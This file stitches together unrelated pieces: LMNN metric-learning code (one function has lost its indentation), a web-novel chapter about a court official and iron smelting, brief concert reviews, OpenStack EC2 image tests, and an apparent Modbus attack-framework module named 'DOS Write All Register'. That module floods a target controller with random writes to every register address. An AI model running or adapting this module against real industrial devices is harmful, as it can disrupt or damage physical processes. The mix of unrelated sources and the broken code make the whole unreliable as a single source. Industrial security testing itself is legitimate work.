                if len(imp_ind):
                    # sample impostors if they are too many
                    if len(imp_ind) > self.max_impostors:
                        ind_sampled = self.random_state_.choice(
                            len(imp_ind), self.max_impostors, replace=False)
                        imp_ind = imp_ind[ind_sampled]
                        dist_batch = dist_batch[ind_sampled]
                    dims = (len(ind_out), len(ind_in))
                    ii, jj = np.unravel_index(imp_ind, shape=dims)
                    # Convert indices to refer to the original data matrix
                    imp_row.extend(ind_out[ii])
                    imp_col.extend(ind_in[jj])
                    imp_dist.extend(dist_batch)
            imp_row = np.asarray(imp_row, dtype=np.intp)
            imp_col = np.asarray(imp_col, dtype=np.intp)
            imp_dist = np.asarray(imp_dist)
            # Make sure we do not exceed max_impostors
            n_impostors = len(imp_row)
            if n_impostors > self.max_impostors:
                ind_sampled = self.random_state_.choice(
                    n_impostors, self.max_impostors, replace=False)
                imp_row = imp_row[ind_sampled]
                imp_col = imp_col[ind_sampled]
                imp_dist = imp_dist[ind_sampled]
        impostors_graph = coo_matrix((imp_dist, (imp_row, imp_col)),
                                     shape=(n_samples, n_samples))
        return impostors_graph
########################
# Some core functions #
#######################
def _select_target_neighbors(X, y, n_neighbors, classes=None, **nn_kwargs):
    """Compute, for every sample, the indices of its target neighbors.

    A sample's target neighbors are its ``n_neighbors`` nearest neighbors
    among the samples that share its class label.

    Parameters
    ----------
    X : array, shape (n_samples, n_features)
        Training inputs.
    y : array, shape (n_samples,)
        Encoded class label of each training input.
    n_neighbors : int
        How many same-class neighbors to select per sample.
    classes : array, shape (n_classes,), optional (default=None)
        Encoded class labels to consider; inferred from ``y`` when None.
    **nn_kwargs : keyword arguments
        Extra arguments forwarded to :class:`neighbors.NearestNeighbors`
        (everything except ``n_neighbors``).

    Returns
    -------
    target_neighbors : array, shape (n_samples, n_neighbors)
        Row i holds the indices (into ``X``) of sample i's target neighbors.
    """
    if classes is None:
        classes = np.unique(y)
    target_neighbors = np.zeros((X.shape[0], n_neighbors), dtype=np.intp)
    nn = NearestNeighbors(n_neighbors=n_neighbors, **nn_kwargs)
    for label in classes:
        class_members, = np.where(y == label)
        nn.fit(X[class_members])
        # Calling kneighbors() with no query excludes each point itself.
        neighbors_within_class = nn.kneighbors(return_distance=False)
        # Map class-local neighbor indices back to indices into X.
        target_neighbors[class_members] = class_members[neighbors_within_class]
    return target_neighbors
def _find_impostors_blockwise(X_a, X_b, radii_a, radii_b,
                              return_distance=False, block_size=8):
    """Find (sample, impostor) pairs in blocks to avoid large memory usage.
    Parameters
    ----------
    X_a : array, shape (n_samples_a, n_components)
        Transformed data samples from class A.
    X_b : array, shape (n_samples_b, n_components)
        Transformed data samples from class B.
    radii_a : array, shape (n_samples_a,)
        Squared distances of the samples in ``X_a`` to their margins.
    radii_b : array, shape (n_samples_b,)
        Squared distances of the samples in ``X_b`` to their margins.
    block_size : int, optional (default=8)
        The maximum number of mebibytes (MiB) of memory to use at a time for
        calculating paired squared distances.
    return_distance : bool, optional (default=False)
        Whether to return the squared distances to the impostors.
    Returns
    -------
    imp_indices : array, shape (n_impostors,)
        Unraveled indices of (sample, impostor) pairs referring to a matrix
        of shape (n_samples_a, n_samples_b).
    imp_distances : array, shape (n_impostors,), optional
        imp_distances[i] is the squared distance between samples imp_row[i] and
        imp_col[i], where
        imp_row, imp_col = np.unravel_index(imp_indices, shape=(n_samples_a,
        n_samples_b))
    """
    n_samples_a = X_a.shape[0]
    # Process X_a in row blocks so each (block x n_samples_b) distance
    # matrix stays within the block_size (MiB) memory budget.
    bytes_per_row = X_b.shape[0] * X_b.itemsize
    block_n_rows = int(block_size*1024*1024 // bytes_per_row)
    imp_indices, imp_distances = [], []
    # X_b squared norm stays constant, so pre-compute it to get a speed-up
    X_b_norm_squared = row_norms(X_b, squared=True)[np.newaxis, :]
    for chunk in gen_batches(n_samples_a, block_n_rows):
        # The function `sklearn.metrics.pairwise.euclidean_distances` would
        # add an extra ~8% time of computation due to input validation on
        # every chunk and another ~8% due to clipping of negative values.
        distances_ab = _euclidean_distances_without_checks(
            X_a[chunk], X_b, squared=True, Y_norm_squared=X_b_norm_squared,
            clip=False)
        # Pairs where a B-sample lies inside an A-sample's margin radius...
        ind_b, = np.where((distances_ab < radii_a[chunk, None]).ravel())
        # ...and pairs where an A-sample lies inside a B-sample's radius.
        # The union makes the impostor relation symmetric per pair.
        ind_a, = np.where((distances_ab < radii_b[None, :]).ravel())
        ind = np.unique(np.concatenate((ind_a, ind_b)))
        if len(ind):
            # Shift flat chunk indices so they refer to the full
            # (n_samples_a, n_samples_b) matrix.
            ind_plus_offset = ind + chunk.start * X_b.shape[0]
            imp_indices.extend(ind_plus_offset)
            if return_distance:
                # We only need to do clipping if we return the distances.
                distances_chunk = distances_ab.ravel()[ind]
                # Clip only the indexed (unique) distances
                np.maximum(distances_chunk, 0, out=distances_chunk)
                imp_distances.extend(distances_chunk)
    imp_indices = np.asarray(imp_indices)
    if return_distance:
        return imp_indices, np.asarray(imp_distances)
    else:
        return imp_indices
def _compute_push_loss(X, target_neighbors, dist_tn, impostors_graph):
    """Compute the LMNN push loss and its gradient for the current impostors.

    Parameters
    ----------
    X : array, shape (n_samples, n_features)
        The training input samples.
    target_neighbors : array, shape (n_samples, n_neighbors)
        Indices of target neighbors of each sample.
    dist_tn : array, shape (n_samples, n_neighbors)
        (Squared) distances of samples to their target neighbors.
    impostors_graph : coo_matrix, shape (n_samples, n_samples)
        Element (i, j) is the distance between sample i and j if j is an
        impostor to i, otherwise zero.

    Returns
    -------
    loss : float
        The push loss caused by the given target neighbors and impostors.
    grad : array, shape (n_features, n_features)
        The gradient of the push loss.
    n_active_triplets : int
        The number of active triplet constraints.
    """
    n_samples, n_neighbors = dist_tn.shape
    # Unpack the COO triplets: (imp_row[i], imp_col[i]) is an impostor pair
    # whose (squared) distance is dist_impostors[i].
    imp_row = impostors_graph.row
    imp_col = impostors_graph.col
    dist_impostors = impostors_graph.data
    loss = 0
    shape = (n_samples, n_samples)
    # A0 accumulates, over all neighbor ranks k, the pairwise weights whose
    # weighted outer differences form the gradient (see
    # _sum_weighted_outer_differences).
    A0 = csr_matrix(shape)
    sample_range = range(n_samples)
    n_active_triplets = 0
    # Iterate over target-neighbor ranks from farthest to nearest.
    for k in range(n_neighbors - 1, -1, -1):
        # Hinge activation where an impostor of the *row* sample lies within
        # the margin set by its k-th target neighbor.
        loss1 = np.maximum(dist_tn[imp_row, k] - dist_impostors, 0)
        ac, = np.where(loss1 > 0)
        n_active_triplets += len(ac)
        A1 = csr_matrix((2 * loss1[ac], (imp_row[ac], imp_col[ac])), shape)
        # Same hinge, seen from the *column* sample of each impostor pair.
        loss2 = np.maximum(dist_tn[imp_col, k] - dist_impostors, 0)
        ac, = np.where(loss2 > 0)
        n_active_triplets += len(ac)
        A2 = csc_matrix((2 * loss2[ac], (imp_row[ac], imp_col[ac])), shape)
        # Total active weight per sample, attributed to its k-th target
        # neighbor; sparse .sum() returns np.matrix, flattened via .getA1().
        val = (A1.sum(1).ravel() + A2.sum(0)).getA1()
        A3 = csr_matrix((val, (sample_range, target_neighbors[:, k])), shape)
        A0 = A0 - A1 - A2 + A3
        # Squared-hinge contribution of this neighbor rank.
        loss += np.dot(loss1, loss1) + np.dot(loss2, loss2)
    grad = _sum_weighted_outer_differences(X, A0)
    return loss, grad, n_active_triplets
#########################
# Some helper functions #
#########################
def _paired_distances_blockwise(X, ind_a, ind_b, squared=True, block_size=8):
    """Equivalent to row_norms(X[ind_a] - X[ind_b], squared=squared).

    Parameters
    ----------
    X : array, shape (n_samples, n_features)
        An array of data samples.
    ind_a : array, shape (n_indices,)
        An array of sample indices.
    ind_b : array, shape (n_indices,)
        Another array of sample indices.
    squared : bool (default=True)
        Whether to return the squared distances.
    block_size : int, optional (default=8)
        The maximum number of mebibytes (MiB) of memory to use at a time for
        calculating paired (squared) distances.

    Returns
    -------
    distances : array, shape (n_indices,)
        An array of pairwise, optionally squared, distances.
    """
    # Process the pairs in blocks so that the temporary difference matrix
    # never exceeds ``block_size`` MiB.
    rows_per_block = int(block_size * 1024 * 1024 // (X.shape[1] * X.itemsize))
    n_pairs = len(ind_a)
    distances = np.zeros(n_pairs)
    for start in range(0, n_pairs, rows_per_block):
        block = slice(start, min(start + rows_per_block, n_pairs))
        diff = X[ind_a[block]] - X[ind_b[block]]
        # Squared Euclidean norm of every row of the difference block.
        distances[block] = np.einsum('ij,ij->i', diff, diff)
    return distances if squared else np.sqrt(distances, out=distances)
def _sum_weighted_outer_differences(X, weights):
    """Compute the sum of weighted outer pairwise differences.

    Parameters
    ----------
    X : array, shape (n_samples, n_features)
        An array of data samples.
    weights : csr_matrix, shape (n_samples, n_samples)
        A sparse weights matrix.

    Returns
    -------
    sum_weighted_outer_diffs : array, shape (n_features, n_features)
        The sum of all outer weighted differences.
    """
    # Symmetrize so each (i, j) pair contributes in both directions.
    W = weights + weights.T
    # Row sums of W give the degree (diagonal) term of the graph Laplacian
    # L = D - W; sparse .sum() yields np.matrix, converted with .getA().
    degrees = W.sum(1).getA()
    # L @ X, computed without forming L explicitly.
    laplacian_times_X = degrees * X - safe_sparse_dot(W, X, dense_output=True)
    return np.dot(X.T, laplacian_times_X)
def _check_scalar(x, name, target_type, min_val=None, max_val=None):
"""Validate scalar parameters type and value.
Parameters
----------
x : object
The scalar parameter to validate.
name : str
The name of the parameter to be printed in error messages.
target_type : type or tuple
Acceptable data types for the parameter.
min_val : float or int, optional (default=None)
The minimum value value the parameter can take. If None (default) it
is implied that the parameter does not have a lower bound.
max_val: float or int, optional (default=None)
The maximum valid value the parameter can take. If None (default) it
is implied that the parameter does not have an upper bound.
Raises
-------
TypeError
If the parameter's type does not match the desired type.
ValueError
If the parameter's value violates the given bounds.
"""
if not isinstance(x, target_type):
raise TypeError('`{}` must be an instance of {}, not {}.'
.format(name, target_type, type(x)))
if min_val is not None and x < min_val:
raise ValueError('`{}`= {}, must be >= {}.'.format(name, x, min_val))
if max_val is not None and x > max_val:
raise ValueError('`{}`= {}, must be <= {}.'.format(name, x, max_val))
#####################################################################
# Convenience function to construct the trivial LMNN - KNN pipeline #
#####################################################################
def make_lmnn_pipeline(
        n_neighbors=3, n_components=None, init='pca', warm_start=False,
        max_impostors=500000, neighbors_params=None, weight_push_loss=0.5,
        impostor_store='auto', max_iter=50, tol=1e-5, callback=None,
        store_opt_result=False, verbose=0, random_state=None, n_jobs=1,
        n_neighbors_predict=None, weights='uniform', algorithm='auto',
        leaf_size=30, n_jobs_predict=None, **kwargs):
    """Construct a LargeMarginNearestNeighbor - KNeighborsClassifier pipeline.

    See the LargeMarginNearestNeighbor module documentation for details on
    the parameters forwarded to the transformer step.

    Parameters
    ----------
    n_neighbors_predict : int, optional (default=None)
        The number of neighbors to use during prediction. If None (default)
        the value of ``n_neighbors`` used to train the model is used.

    weights : str or callable, optional (default = 'uniform')
        Weight function used in prediction. Possible values:

        - 'uniform' : uniform weights. All points in each neighborhood
          are weighted equally.
        - 'distance' : weight points by the inverse of their distance.
          In this case, closer neighbors of a query point will have a
          greater influence than neighbors which are further away.
        - [callable] : a user-defined function which accepts an
          array of distances, and returns an array of the same shape
          containing the weights.

    algorithm : {'auto', 'ball_tree', 'kd_tree', 'brute'}, optional
        Algorithm used to compute the nearest neighbors:

        - 'ball_tree' will use :class:`BallTree`
        - 'kd_tree' will use :class:`KDTree`
        - 'brute' will use a brute-force search.
        - 'auto' will attempt to decide the most appropriate algorithm
          based on the values passed to :meth:`fit` method.

        Note: fitting on sparse input will override the setting of
        this parameter, using brute force.

    leaf_size : int, optional (default = 30)
        Leaf size passed to BallTree or KDTree. This can affect the
        speed of the construction and query, as well as the memory
        required to store the tree. The optimal value depends on the
        nature of the problem.

    n_jobs_predict : int, optional (default=None)
        The number of parallel jobs to run for neighbors search during
        prediction. If None (default), then the value of ``n_jobs`` is used.

    memory : None, str or object with the joblib.Memory interface, optional
        Used to cache the fitted transformers of the pipeline. By default,
        no caching is performed. If a string is given, it is the path to
        the caching directory. Enabling caching triggers a clone of
        the transformers before fitting. Therefore, the transformer
        instance given to the pipeline cannot be inspected
        directly. Use the attribute ``named_steps`` or ``steps`` to
        inspect estimators within the pipeline. Caching the
        transformers is advantageous when fitting is time consuming.

    Returns
    -------
    lmnn_pipe : Pipeline
        A Pipeline instance with two steps: a ``LargeMarginNearestNeighbor``
        instance that is used to fit the model and a ``KNeighborsClassifier``
        instance that is used for prediction.

    Examples
    --------
    >>> from pylmnn import make_lmnn_pipeline
    >>> from sklearn.datasets import load_iris
    >>> from sklearn.model_selection import train_test_split
    >>> X, y = load_iris(return_X_y=True)
    >>> X_train, X_test, y_train, y_test = train_test_split(X, y,
    ... stratify=y, test_size=0.7, random_state=42)
    >>> lmnn_pipe = make_lmnn_pipeline(n_neighbors=3, n_neighbors_predict=3,
    ... random_state=42)
    >>> lmnn_pipe.fit(X_train, y_train)  # doctest: +ELLIPSIS
    Pipeline(...)
    >>> print(lmnn_pipe.score(X_test, y_test))
    0.971428571429
    """
    # ``memory`` is accepted only through **kwargs; any other leftover
    # keyword argument is a user error.
    memory = kwargs.pop('memory', None)
    if kwargs:
        unknown_arg = list(kwargs.keys())[0]
        raise TypeError('Unknown keyword arguments: "{}"'.format(unknown_arg))

    lmnn = LargeMarginNearestNeighbor(
        n_neighbors=n_neighbors, n_components=n_components, init=init,
        warm_start=warm_start, max_impostors=max_impostors,
        neighbors_params=neighbors_params, weight_push_loss=weight_push_loss,
        impostor_store=impostor_store, max_iter=max_iter, tol=tol,
        callback=callback, store_opt_result=store_opt_result, verbose=verbose,
        random_state=random_state, n_jobs=n_jobs)

    # Prediction-time settings fall back to their training-time counterparts.
    knn = KNeighborsClassifier(
        n_neighbors=(n_neighbors if n_neighbors_predict is None
                     else n_neighbors_predict),
        weights=weights, algorithm=algorithm, leaf_size=leaf_size,
        n_jobs=(n_jobs if n_jobs_predict is None else n_jobs_predict))

    return Pipeline([('lmnn', lmnn), ('knn', knn)], memory=memory)
|
The next morning, after Ren Baqian woke up, he washed himself up and began to pack his belongings. After which, he went to see the empress.
This time around, the meeting place wasn't the usual Yangxin Palace Hall. Instead, it was the throne room. This was the first time Ren Baqian had come here.
By the time he reached the throne room, the empress was already seated upon a golden throne on an elevated platform. There were already a few people standing beneath her.
"Greetings, Your Majesty." After greeting the empress, Ren Baqian stood to one side in a well-behaved manner and examined those people. One of them was a burly man clad in metallic armor with a helmet in his hand. There was a feather sticking out of the top of his helmet. The burly man's skin was bronze in color, and he looked as though he was thirty-something years old. He was a military officer that was of Standard class, Rank 6.
Other than him, there were two other men. One of them had a very thick beard, and he looked approximately forty years old. Right now, he was examining Ren Baqian closely.
The other man looked as though he was close to forty years old. When compared to the aboriginals, his body was considered slightly petite. However, he was still bigger than Ren Baqian.
The former was wearing a Secondary class, Rank 3 official robe while the latter was wearing a Secondary class, Rank 5 official robe.
"Ren Baqian!" The empress's cold voice resounded through the air.
"Yes, Your Majesty." Ren Baqian quickly took a few steps forward and faced the empress.
"Storyteller Ren Baqian of Qingxin Palace Hall is extremely capable, loyal, and responsible. I hereby promote you to Imperial Deputy Prefect. You are to take office immediately."
Ren Baqian was stunned. Following which, he kneeled down on one knee and replied, "Thank you, Your Majesty."
Ren Baqian was still in a daze. He was promoted after arriving here for merely two minutes. Furthermore, he was promoted to Imperial Deputy Prefect, which was of Secondary class, Rank 5. The speed at which he was promoted was faster than a rocket's.
Ren Baqian had been in this world for less than three months, but he had already completed walking a path that an ordinary Dayao citizen would take a lifetime to complete.
Even an ordinary official or general that had obtained great meritorious service wasn't promoted so quickly.
However, the three other persons weren't surprised by Ren Baqian's promotion at all.
After all, they all knew who Ren Baqian was. If nothing went wrong, this person would become the prince consort in the future. This official position was merely a stepping stone for him.
Furthermore, the position of Imperial Deputy Prefect was responsible for various important matters in the imperial palace. This position was different from an ordinary position in the six departments of the imperial court or a military position.
"Imperial Deputy Prefect Ren Baqian will be in charge of this mission and Overseer of Military Arms, Tao Jiyuan, will be his assistant. I want you to inspect Mount Damo and Mount Liucui and see if there's any solution to increasing our output of iron. If you succeed, I will reward you handsomely."
"Yes, Your Majesty," Ren Baqian and Tao Jiyuan bowed and replied.
When Ren Baqian heard these words, he knew why the empress promoted him. An official position of Secondary class, Rank 8 wasn't high enough for him to be in charge of this mission.
After he was promoted to Imperial Deputy Prefect, his rank would be similar to that Overseer of Military Arms. Furthermore, given his unique status, he was definitely worthy to be in charge of this matter.
"Teng Ji, Colonel of Winged Guards, lead three hundred winged cavalry to protect them along the way. You will be fully responsible for anything that goes wrong," the empress continued with a cold voice.
"Yes, Your Majesty," the armor-clad general immediately replied.
Naturally, he knew who the empress wanted him to protect.
If both of them encountered danger at the same time, even if he died, he had to bring Deputy Prefect Ren back alive.
Otherwise, he would have to die to atone for his sin.
"Go back and make your preparations, set off after noon. Ren Baqian, you remain here." After the empress finished speaking, Tao Jiyuan and Teng Ji left the throne room.
"I am Overseer of Military Arms, Feng Hou, I have something to ask you."
"Greetings, Overseer of Military Arms." Ren Baqian turned around and cupped his fists.
"Deputy Prefect Ren, how confident are you with regards to the matter of increasing the output of iron ores from the mine?" Feng Hou asked Ren Baqian.
"That will have to depend on the amount of iron ore and their distribution in the mines. If extraction of the iron ores is the only problem, I might have some solutions," Ren Baqian pondered for a while before replying Feng Hou.
"According to Her Majesty, Deputy Prefect Ren has means to smelt iron ores and forge weapons too? Can you tell me how are you going to do it? This way, I can make some preparations too," Feng Hou asked again.
"The main issues with smelting iron ores are insufficient heat and unstable temperature. A simple solution to these two issues is box bellows. However, if you want to do it for a long period of time, you will need a blast furnace. It doesn't require much skill to operate. Furthermore, it doesn't require many components and the stability of its temperature is very high. If the steel that is produced contains very little impurities, we can directly use it to forge weapons. This will save a lot of manpower," Ren Baqian explained.
"What is a box bellows? What is a blast furnace? What is steel?" Feng Hou furrowed his eyebrows and asked three questions in a row.
With regards to the husband chosen by Her Majesty, Feng Hou shared the same sentiments as everyone else. Ren Baqian did not seem at all capable; otherwise, everyone wouldn't have raised objections to the empress's decision back then.
Ren Baqian was weak and delicate. Other than bootlicking, he did not seem to have any other capabilities.
This morning, Her Majesty summoned them and told them something.
Her Majesty wanted to increase the iron output from the iron mines.
Her Majesty wasn't the only one that had been racking her brain to come up with a solution to this matter. The entire Ministry of Works had been doing so as well. In reality, it was too hard to extract iron ores from the two iron mines.
For so many years, they had been extracting iron ore from the mines bit by bit. Countless people had racked their brains to no avail. Everyone felt that extracting iron ore from the mines bit by bit was the only way.
This time around, Her Majesty wanted Ren Baqian to inspect the mines and think of a solution.
If this was the only thing that the empress wanted Ren Baqian to do, Feng Hou had no objections with it at all. If Ren Baqian succeeded, he would benefit as well. If Ren Baqian failed, it had nothing to do with him at all. After all, he was the Overseer of Military Arms.
However, when he heard that Her Majesty wanted Ren Baqian to interfere with the matters of smelting iron ores and forging weapons, he could not help but to raise objections. If Ren Baqian interfered with these matters, what was the point of having him as the Overseer of Military Arms?
Furthermore, did Ren Baqian really know how to extract iron ore from iron mines, smelt iron ore, and forge weapons?
If Ren Baqian was truly capable, everyone in the Department of Military Arms would listen to him. Otherwise, Feng Hou would definitely not let him interfere with the affairs of Department of Military Arms.
Therefore, he decided to ask this Storyteller Ren some questions.
Ren Baqian did not mind Feng Hou asking him these questions.
"You can try making a box bellows. It's a huge box with a handle that can be pulled and pushed on one side. It must also have a valve for air to enter. A person operating it will have to push and pull the handle to channel air into it. Air contains oxygen. Sufficient oxygen will allow the fire to burn better and longer. Furthermore, if there is a person that keeps on pulling and pushing the handle, the fire will be more stable and the temperature of the fire will be higher. These conditions will improve the smelting process," Ren Baqian gave Feng Hou a rough explanation.
"Now, I will talk about the blast furnace. First, I will explain what steel is. A weapon that is made out of ordinary iron is very weak. Therefore, we will have to remove the impurities from the iron and add a little carbon to it. Eventually, we will obtain steel. A blast furnace will directly remove the impurities in the iron during the smelting process, and this process will produce steel. This way, we can save a lot of manpower, time, and effort," Ren Baqian continued.
Feng Hou knitted his eyebrows. He did not understand what Ren Baqian had said. However, Ren Baqian's words did sound pretty awesome.
After staying in the Department of Military Arms for over ten years, Feng Hou knew pretty much everything about smelting iron ore and forging weapons. However, he did not understand anything that Ren Baqian had just told him.
When the empress saw the troubled look on Feng Hou's face, her lips curled upwards.
This was what she wanted to see.
Of course, she knew what everyone was worrying about.
It was her own decision that she chose Ren Baqian as her husband and no one else had the right to interfere with her decision. However, she was still annoyed at the fact that everyone was looking down on her decision.
Even if Feng Hou did not raise his doubts regarding Ren Baqian now, she would find him an opportunity to do so sooner or later.
|
import os
import threading
import random
from System.Core.Global import *
from System.Core.Colors import *
from System.Core.Modbus import *
from System.Lib import ipcalc
down = False
class Module:
    # Framework module for stress-testing a Modbus slave by writing random
    # values to every holding-register address (denial-of-service test).

    # Module metadata displayed by the framework.
    info = {
        'Name': 'DOS Write All Register',
        'Author': ['@enddo'],
        'Description': ("DOS With Write All Register Function"),
    }
    # User-configurable options: name -> [default value, required?, help text].
    options = {
        'RHOST' :['' ,True ,'The target IP address'],
        'RPORT' :[502 ,False ,'The port number for modbus protocol'],
        'UID' :['' ,True ,'Modbus Slave UID.'],
        'Threads' :[1 ,False ,'The number of concurrent threads'],
        'Output' :[False ,False ,'The stdout save in output directory']
    }
    # Accumulated transcript of the run; optionally dumped to the Output dir.
    output = ''

    def exploit(self):
        # Entry point called by the framework: spawn worker threads that
        # flood the target with Modbus "write single register" requests.
        moduleName = self.info['Name']
        print bcolors.OKBLUE + '[+]' + bcolors.ENDC + ' Module ' + moduleName + ' Start'
        for i in range(int(self.options['Threads'][0])):
            if(self.options['RHOST'][0]):
                thread = threading.Thread(target=self.do,args=(self.options['RHOST'][0],))
                thread.start()
                THREADS.append(thread)
            else:
                # No target configured; nothing to launch.
                break
        for thread in THREADS:
            thread.join()
            if(down):
                # A worker flagged the target as unreachable; stop waiting.
                self.printLine('[-] Modbus is not running on : ' + self.options['RHOST'][0],bcolors.WARNING)
                break
        if(self.options['Output'][0]):
            # Append this run's transcript to Output/<module>_<target>.txt.
            open(mainPath + '/Output/' + moduleName + '_' + self.options['RHOST'][0].replace('/','_') + '.txt','a').write('='*30 + '\n' + self.output + '\n\n')
        self.output = ''

    def printLine(self,str,color):
        # Record the line in the transcript and echo it with the status tag
        # ('[+]' / '[-]') colorized.
        self.output += str + '\n'
        if(str.find('[+]') != -1):
            print str.replace('[+]',color + '[+]' + bcolors.ENDC)
        elif(str.find('[-]') != -1):
            # NOTE(review): this replaces '[-]' with a colored '[+]' tag --
            # looks like a copy/paste slip; kept as-is in this doc-only pass.
            print str.replace('[-]',color + '[+]' + bcolors.ENDC)
        else:
            print str

    def do(self,ip):
        # Worker thread: walk the register address space, writing a random
        # value to each address, until done or the target goes down.
        global down
        for i in range(0xffff):
            if(down):
                # Another worker already detected the target is down.
                break
            c = connectToTarget(ip,self.options['RPORT'][0])
            if(c == None):
                # Connection failed: assume the target is down and signal
                # all other workers to stop.
                down = True
                return None
            try:
                self.printLine('[+] Write on Register Address ' + str(int(hex(i|0x1111),16)),bcolors.OKGREEN)
                ans = c.sr1(ModbusADU(transId=getTransId(),unitId=int(self.options['UID'][0]))/ModbusPDU06_Write_Single_Register(registerAddr=int(hex(i|0x1111),16),registerValue=int(hex(random.randint(0,16**4-1)|0x1111),16)),timeout=timeout, verbose=0)
                ans = ModbusADU_Answer(str(ans))
                self.printLine('[+] Response is :',bcolors.OKGREEN)
                ans.show()
            except:
                # Best-effort flood: ignore malformed or missing responses.
                pass
|
NYC electropop group Hooray for Earth employs ferocious beats and five reverb-loving vocalists to create a huge, warm and danceable sound.
Watching Owen Pallett piece together his gorgeous symphonic pop compositions on stage is an engrossing experience. Using loop pedals, he adds one layer at a time, with his violin serving as a lead, rhythm and even percussion instrument all at once. He announced that this would likely be his last solo show, as he recently started playing with a drummer.
Surfer Blood‘s set got cut off after only five songs, which was especially unfortunate considering they now have new material to show off. They did manage to play two rocking new songs, though.
On record, Seattle’s Telekinesis is just Michael Benjamin Lerner, but live, he enlists a full band to recreate his enjoyable power pop songs.
Menomena‘s engaging rock made skillful use of piano and saxophone.
Okkervil River only got to play for half an hour, but they made the most of it, tearing through favorites like “For Real” and “Our Life is Not a Movie or Maybe” as well as two tracks from their upcoming album, I am Very Far. As Will Sheff kicked off the clapping for closer “Unless It’s Kicks,” he said “Put your hands up! I want to ruin you for all the other bands you’re going to see today.” And they basically did, until their nighttime set (see below).
Philadelphia guitar-and-drums duo Reading Rainbow plays bouncy, cheery pop with sweet vocal harmonies.
NYC rock trio Yellow Ostrich manages to sound like a much larger band thanks to the use of loops, horns, and powerful drumbeats.
Judging by the four new songs Okkervil River played during their second set of the day, including the surprisingly heavy “The Valley” and the hard-hitting waltz “Wake and Feel Fine,” their new album may turn out to contain some of their most powerful material yet.
|
# Copyright 2014 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest_lib.common.utils import data_utils
import testtools
from ec2api.tests.functional import base
from ec2api.tests.functional import config
CONF = config.CONF
class ImageTest(base.EC2TestCase):
    """Functional tests for EC2 image describe/create/attribute operations."""

    @testtools.skipUnless(CONF.aws.ebs_image_id, "EBS image id is not defined")
    def test_check_ebs_image_type(self):
        """The configured EBS image must report an 'ebs' root device type."""
        image_id = CONF.aws.ebs_image_id
        data = self.client.describe_images(ImageIds=[image_id])
        self.assertEqual(1, len(data['Images']))
        image = data['Images'][0]
        self.assertEqual("ebs", image['RootDeviceType'],
                         "Image is not EBS image")

    @testtools.skipUnless(CONF.aws.ebs_image_id, "EBS image id is not defined")
    def test_check_ebs_image_volume_properties(self):
        """The root block device mapping of an EBS image exposes EBS fields."""
        image_id = CONF.aws.ebs_image_id
        data = self.client.describe_images(ImageIds=[image_id])
        self.assertEqual(1, len(data['Images']))
        image = data['Images'][0]
        self.assertTrue(image['RootDeviceName'])
        self.assertTrue(image['BlockDeviceMappings'])
        device_name = image['RootDeviceName']
        # Find the mapping that corresponds to the root device.
        bdm = image['BlockDeviceMappings']
        bdm = [v for v in bdm if v['DeviceName'] == device_name]
        self.assertEqual(1, len(bdm))
        bdm = bdm[0]
        self.assertIn('Ebs', bdm)
        ebs = bdm['Ebs']
        self.assertIsNotNone(ebs.get('SnapshotId'))
        self.assertIsNotNone(ebs.get('DeleteOnTermination'))
        self.assertIsNotNone(ebs.get('VolumeSize'))
        if CONF.aws.run_incompatible_tests:
            self.assertIsNotNone(ebs.get('Encrypted'))
            self.assertFalse(ebs.get('Encrypted'))
        self.assertIsNotNone(ebs.get('VolumeType'))

    @testtools.skipUnless(CONF.aws.ebs_image_id, "EBS image id is not defined")
    def test_describe_image_with_filters(self):
        """describe_images filters (image-type, image-id) behave correctly."""
        image_id = CONF.aws.ebs_image_id
        data = self.client.describe_images(ImageIds=[image_id])
        self.assertEqual(1, len(data['Images']))

        data = self.client.describe_images(
            # NOTE(ft): limit output to prevent timeout over AWS
            Filters=[{'Name': 'image-type', 'Values': ['kernel', 'ramdisk']}])
        if len(data['Images']) < 2:
            self.skipTest("Insufficient images to check filters")
        data = self.client.describe_images(
            Filters=[{'Name': 'image-id', 'Values': [image_id]}])
        self.assertEqual(1, len(data['Images']))
        self.assertEqual(image_id, data['Images'][0]['ImageId'])

    def test_check_image_operations_negative(self):
        """Invalid or unauthorized image operations raise the right errors."""
        # NOTE(andrey-mp): image_id is a public image created by admin
        image_id = CONF.aws.image_id

        self.assertRaises('InvalidRequest',
                          self.client.describe_image_attribute,
                          ImageId=image_id, Attribute='unsupported')

        self.assertRaises('AuthFailure',
                          self.client.describe_image_attribute,
                          ImageId=image_id, Attribute='description')

        self.assertRaises('InvalidParameterCombination',
                          self.client.modify_image_attribute,
                          ImageId=image_id, Attribute='unsupported')

        self.assertRaises('InvalidParameter',
                          self.client.modify_image_attribute,
                          ImageId=image_id, Attribute='blockDeviceMapping')

        self.assertRaises('InvalidParameterCombination',
                          self.client.modify_image_attribute,
                          ImageId=image_id)

        self.assertRaises('AuthFailure',
                          self.client.modify_image_attribute,
                          ImageId=image_id, Description={'Value': 'fake'})

        self.assertRaises('AuthFailure',
                          self.client.modify_image_attribute,
                          ImageId=image_id,
                          LaunchPermission={'Add': [{'Group': 'all'}]})

        self.assertRaises('MissingParameter',
                          self.client.modify_image_attribute,
                          ImageId=image_id, Attribute='description')

        self.assertRaises('InvalidParameterCombination',
                          self.client.modify_image_attribute,
                          ImageId=image_id, Attribute='launchPermission')

        self.assertRaises('InvalidRequest',
                          self.client.reset_image_attribute,
                          ImageId=image_id, Attribute='fake')

        self.assertRaises('AuthFailure',
                          self.client.reset_image_attribute,
                          ImageId=image_id, Attribute='launchPermission')

        self.assertRaises('AuthFailure',
                          self.client.deregister_image,
                          ImageId=image_id)

    @testtools.skipUnless(CONF.aws.image_id, 'image id is not defined')
    def test_create_image_from_non_ebs_instance(self):
        """create_image must be rejected for instance-store-backed instances."""
        image_id = CONF.aws.image_id
        data = self.client.describe_images(ImageIds=[image_id])
        image = data['Images'][0]
        if 'RootDeviceType' in image and 'ebs' in image['RootDeviceType']:
            raise self.skipException('image_id should not be EBS image.')

        instance_id = self.run_instance(ImageId=image_id)

        def _rollback(fn_data):
            # If creation unexpectedly succeeds, deregister the image.
            self.client.deregister_image(ImageId=fn_data['ImageId'])

        self.assertRaises('InvalidParameterValue',
                          self.client.create_image, rollback_fn=_rollback,
                          InstanceId=instance_id, Name='name',
